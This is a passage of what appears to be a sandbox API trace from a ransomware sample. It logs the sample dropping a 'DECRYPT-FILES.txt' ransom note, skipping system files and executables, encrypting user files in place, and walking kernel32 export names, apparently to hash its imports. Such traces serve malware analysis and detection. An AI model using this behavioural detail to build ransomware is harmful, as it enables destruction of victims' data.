HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0080.094] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 90 [0080.094] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0080.094] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\\\DECRYPT-FILES.txt") returned 108 [0080.094] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0080.095] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0080.096] CloseHandle (hObject=0x45c) returned 1 [0080.097] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 90 [0080.097] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*" [0080.097] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabef9da0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabef9da0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0080.097] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.097] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabef9da0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabef9da0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.097] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.097] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.097] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dc975e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dc975e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="1b4dd67f29cb1962.customDestinations-ms", cAlternateFileName="1B4DD6~1.CUS")) returned 1 [0080.097] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="DECRYPT-FILES.txt") returned -1 [0080.097] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="autorun.inf") returned -1 [0080.097] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="boot.ini") returned -1 [0080.097] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="desktop.ini") returned -1 [0080.097] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="ntuser.dat") returned -1 [0080.097] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="iconcache.db") returned -1 [0080.097] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="bootsect.bak") returned -1 [0080.097] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="ntuser.dat.log") returned -1 [0080.097] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="thumbs.db") returned -1 [0080.097] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="Bootfont.bin") returned -1 [0080.097] lstrlenW (lpString="1b4dd67f29cb1962.customDestinations-ms") returned 38 [0080.097] lstrcmpiW (lpString1="customDestinations-ms", lpString2="lnk") returned -1 [0080.097] lstrcmpiW (lpString1="customDestinations-ms", lpString2="exe") returned -1 [0080.097] lstrcmpiW (lpString1="customDestinations-ms", lpString2="sys") returned -1 [0080.097] lstrcmpiW (lpString1="customDestinations-ms", lpString2="dll") returned -1 [0080.097] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 90 [0080.097] lstrlenW (lpString="1b4dd67f29cb1962.customDestinations-ms") returned 38 [0080.097] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0080.097] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="1b4dd67f29cb1962.customDestinations-ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms" [0080.097] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.098] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0080.098] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=24) returned 1 [0080.098] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0080.098] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0080.098] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0080.099] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0080.099] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.100] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0080.100] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0080.101] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.101] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0080.101] CloseHandle (hObject=0x464) returned 1 [0080.101] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.101] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0080.102] CloseHandle (hObject=0x0) returned 0 [0080.102] CloseHandle (hObject=0x460) returned 1 [0080.103] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.103] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.103] GetTickCount () returned 0x114c83f [0080.103] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.104] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0080.104] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.104] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.104] lstrlenA (lpString="kernel32.dll") returned 12 [0080.104] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0080.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0080.104] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0080.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0080.104] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0080.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0080.105] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0080.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0080.105] lstrlenA (lpString="ADDATOMA") returned 8 [0080.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0080.105] lstrlenA (lpString="ADDATOMW") returned 8 [0080.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0080.105] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0080.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0080.105] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0080.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0080.105] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0080.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0080.105] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0080.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0080.105] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0080.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0080.105] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0080.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0080.105] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0080.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0080.105] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0080.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0080.105] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0080.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0080.105] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0080.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0080.105] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0080.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0080.105] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0080.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0080.105] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0080.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0080.105] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0080.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0080.105] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0080.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0080.106] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0080.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0080.106] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0080.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0080.106] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0080.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0080.106] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0080.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0080.106] lstrlenA (lpString="BACKUPREAD") returned 10 [0080.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0080.106] lstrlenA (lpString="BACKUPSEEK") returned 10 [0080.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0080.106] lstrlenA (lpString="BACKUPWRITE") returned 11 [0080.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0080.106] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0080.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0080.106] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0080.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0080.106] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0080.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0080.106] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0080.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0080.106] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0080.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0080.106] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0080.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0080.106] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0080.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0080.106] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0080.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0080.106] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0080.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0080.106] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0080.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0080.106] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0080.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0080.106] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0080.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0080.107] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0080.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0080.107] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0080.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0080.107] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0080.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0080.107] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0080.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0080.107] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0080.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0080.107] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0080.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0080.107] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0080.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0080.107] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0080.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0080.107] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0080.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0080.107] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0080.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0080.107] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0080.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0080.107] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0080.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0080.107] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0080.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0080.107] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0080.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0080.107] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0080.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0080.107] lstrlenA (lpString="BEEP") returned 4 [0080.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0080.107] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0080.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0080.107] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0080.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0080.107] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0080.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0080.108] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0080.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0080.108] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0080.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0080.108] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0080.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0080.108] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0080.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0080.108] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0080.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0080.108] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0080.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0080.108] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0080.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0080.108] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0080.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0080.108] lstrlenA (lpString="CANCELIO") returned 8 [0080.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0080.108] lstrlenA (lpString="CANCELIOEX") returned 10 [0080.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0080.108] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0080.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0080.108] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0080.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0080.108] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0080.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0080.108] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0080.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0080.108] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0080.108] 